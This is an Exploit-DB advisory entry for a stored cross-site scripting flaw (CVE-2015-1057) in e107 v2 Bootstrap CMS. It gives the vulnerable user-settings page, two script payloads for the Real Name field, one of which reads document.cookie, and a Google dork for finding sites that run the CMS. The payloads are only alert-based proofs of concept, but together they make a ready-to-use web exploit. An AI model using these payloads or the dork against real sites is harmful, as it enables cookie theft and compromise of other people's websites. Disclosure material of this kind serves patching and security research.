e107 2 Bootstrap CMS - Cross-Site Scripting

Author: Ahmet Agar / 0x97
type: webapps
platform: php
port: 
date_added: 2015-01-03 
date_updated: 2015-01-03 
verified: 1 
codes: OSVDB-116692;CVE-2015-1057 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt36000/screen-shot-2015-01-03-at-104634.png 
application_url: 

 _____       _____  ______
|  _  |     |  _  ||___  /
| |/' |_  __| |_| |   / /
|  /| \ \/ /\____ |  / /
\ |_/ />  < .___/ /./ /
 \___//_/\_\\____/ \_/
                        by bl4ck s3c


# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel

# Vulnerability Description:

CMS user details section is vulnerable to XSS. You can run XSS payloads.

XSS Vulnerability #1:

Go Update user settings page

"http://{target-url}/usersettings.php"

Set Real Name value;

"><script>alert(String.fromCharCode(88, 83, 83))</script>

or

"><script>alert(document.cookie)</script>


========
Credits:
========

Vulnerability found and advisory written by Ahmet Agar.

===========
References:
===========

http://www.0x97.info
htts://twitter.com/_HacKingZ_